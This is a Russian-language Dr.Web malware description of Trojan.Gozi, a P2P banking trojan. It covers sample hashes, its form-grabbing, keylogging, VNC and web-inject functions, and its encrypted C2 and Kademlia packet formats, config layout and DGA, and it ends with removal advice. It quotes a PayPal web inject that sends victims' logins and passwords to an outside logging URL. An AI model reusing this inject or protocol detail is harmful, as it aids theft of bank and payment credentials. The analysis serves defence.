Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.Gozi

Добавлен в вирусную базу Dr.Web: 2016-03-18

Описание добавлено:

sha1 (p2p версия)0fb30e03f71f0a20340ca0cb634e6250c14a1109
sha1 installer1720115a8a646f4a0a3741cec7266b82ff065a7e
sha1 client.dll x320690ef42ff894dd85be873b4d95183a1af5f9a72
sha1 client.dll x642d9cb08d9f4ed28c55a93355c7e5ae39b1f43488
sha1 vnc32 3bb13d9d4b4eaabb314d90d294119d2f982736ac
sha1 vnc64 17930b20f98ac7e92d28598901710254f1cf6315

Обновленная версия известного банковского троянца, обладающая функционалом для создания однорангового P2P-ботнета. Основные функции:

  • похищение данных, которые пользователи вводят в различные экранные формы (формграббинг);
  • фиксация нажатия клавиш (кейлоггинг);
  • встраивание в просматриваемые на зараженном компьютере веб-страницы постороннего содержимого (веб-инжекты);
  • получение удаленного доступа к рабочему столу зараженной машины с использованием технологии Virtual Network Computing (VNC);
  • запуск по команде злоумышленников прокси-сервера SOCKS;
  • загрузка и установка плагинов.

Для обмена данными троянец использует протокол HTTP, информация зашифрована в GET-запросе, который имеет следующий вид:

http://made****h.pw/images/EYI/uE4P5lkUATTfrO/L4Iv7VEvWWlYBM9qKuE67ixOoebU1ef9HHS7Xvwhns0o
bfoegeauxh8PajwSUrNkSFTtqnU/Fy/MyNURytngSxc_2FYvcf9O
98PFCv2bBHEE//jMiPVxyqqgQ/f_2/FBgMUnmhszPJ5_2BuSA.gif

В результате расшифровки получается строка:

jkwerhw=sdalfwewesd3&server=12&crc=7b033&version=214721&user=55deba95d542febda
b0e1570986cdaf0&soft=1&id=1045

где:
server, id — извлекаются из конфигурации троянца;
user – уникальный идентификатор бота;
crc - crc32 для конфигурации, если такой нет, то значение получается с помощью функции GetTickCount.

Троянец может отправлять запросы к разным типам сценариев:

  • .jpeg – запрос конфигурации веб-инжектов;
  • .gif – запрос персонального задания;
  • .bmp – отправка на сервер логов, данные передаются в виде multipart/form-data.

Ответ сервера зашифрован с использованием алгоритмов RSA+Serpent+XOR. Если сообщение содержит информацию для выполнения веб-инжектов, они сжимаются с помощью aplib. Такие сообщения состоят из отдельных блоков:

struct block_t
{
    DWORD size;
    BYTE data[size]; //строка с нулевым символом в конце
}

Пример веб-инжекта в веб-страницу платежной системы PayPal:

*paypal.*
id="js_transactionCollection"
id="js_transactionCollection" style="visibility:hidden"
...
Order
*paypal.com/*/cgi-bin/merchantpaymentweb*
PROCESS
check.unitssl.com/log.php?action=log&text=pp;l=@login@;p=@pass@&botid=@ID@
*paypal.com/*/cgi-bin/merchantpaymentweb*
POST
login_email
login
*paypal.com/*/cgi-bin/merchantpaymentweb*
POST
login_password
pass

В последней секции исполняемого файла троянец хранит информацию о расположении собственной конфигурации:

2E 72 65 6C-6F 63 00 00-00 30 00 00-00 10 02 00  .reloc   0   ►☻
00 26 00 00-00 D8 01 00-00 00 00 00-00 00 00 00   &   ╪☺
00 00 00 00-40 00 00 40-00 00 00 00-00 00 00 00      @  @
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
4A 31 00 00-00 32 02 00-84 00 00 00-64 5E 28 E1  J1   2☻ Д   d^(с
00 01 01 00-4A 31 00 00-00 34 02 00-81 01 00 00   ☺☺ J1   4☻ Б☺
CB AF 22 D7-00 20 01 00-00 00 00 00-00 00 00 00  ╦п"╫  ☺
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00

Секция конфигурации отыскивается по значению 0x314a и имеет вид:

struct config_block_t
{
  WORD magic;
  WORD numHashes; 
  DWORD pos; //rva конфигурации
  DWORD size; //размер
  DWORD id; //id конфигурации
  DWORD flag; //0x10000 - компрессия aplib
  DWORD hashes[numHashes];
};

Если установлен соответствующий флаг, после извлечения данные распаковываются с использованием aplib. Распакованные конфигурационные данные с сопоставленными параметрами имеют вид:

{"GROUP": "1045", "1481529637": "10", "SENDTIMEOUT": "200", "BCTIMEOUT": "10",
"CONFIGFAILTIMEOUT": "200", "TASKTIMEOUT": "200", "DGA_SEED": "1", "HOSTS": "127.0.0.1",
"SERVERKEY": "87654321POIUYTRE", "SERVER": "12", "KNOCKERTIMEOUT": "200",
"CONFIGTIMEOUT": "200", "287775871": "1"}

Где:

GROUP - id, SERVER - server в запросе; 
DGA_SEED - константа инициализации DGA;
SERVERKEY - ключ для serpent;
HOSTS - список управляющих серверов через пробел.

Trojan.Gozi использует специальный алгоритм генерации доменов — Domain generation algorithm (DGA). Для этого троянец загружает с сервера NASA текстовый файл-словарь:

http://nssdc.gsfc.nasa.gov/planetary/text/pioneer-11_endops.txt

Этот файл разбирается на слова, вычисляется текущая дата, и на основе этой информации по специальному алгоритму формируется имя домена управляющего сервера. Троянец автоматически меняет управляющий сервер каждые 15 дней. Вся информация, которой Trojan.Gozi обменивается со своими командными серверами, шифруется.

Протокол для формирования одноранговой P2P-сети базируется на kademlia. UDP-пакеты зашифрованы с использованием RC4 и имеют следующую структуру:

struct kad_t
{
    BYTE flag; //случайное значение, за исключением двух младших бит, 0 бит - пакет зашифрован sendKey, 1 бит - (1) пакет зашифрован sendKey=0 или (0) sendKey=nid1^nid2^nid3^nid4
    DWORD rndKey; //случайная составляющая ключа
    kad_transport_t transport; //зашифровано
    kad_head_t head; // зашифровано
    BYTE data[]; // зашифровано
}
 
struct kad_transport_t
{
    DWORD magic; //значение 0x395F2EC1
    DWORD sendKey; //случайное значение, используется для шифрования ответов
    DWORD recvKey;
}
 
struct kad_head_t
{
    BYTE opType; //0xe4 - UDP KAD
    BYTE op; //команды протокола
    WORD size; //длинна kad_t.data
};

Передаваемые и загруженные файлы троянец хранит в папке:

%APPDATA%\\Microsoft\\{%08X-%04X-%04X-%04X-%08X%04X}\<md5hashOfName>

Новость о троянце

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке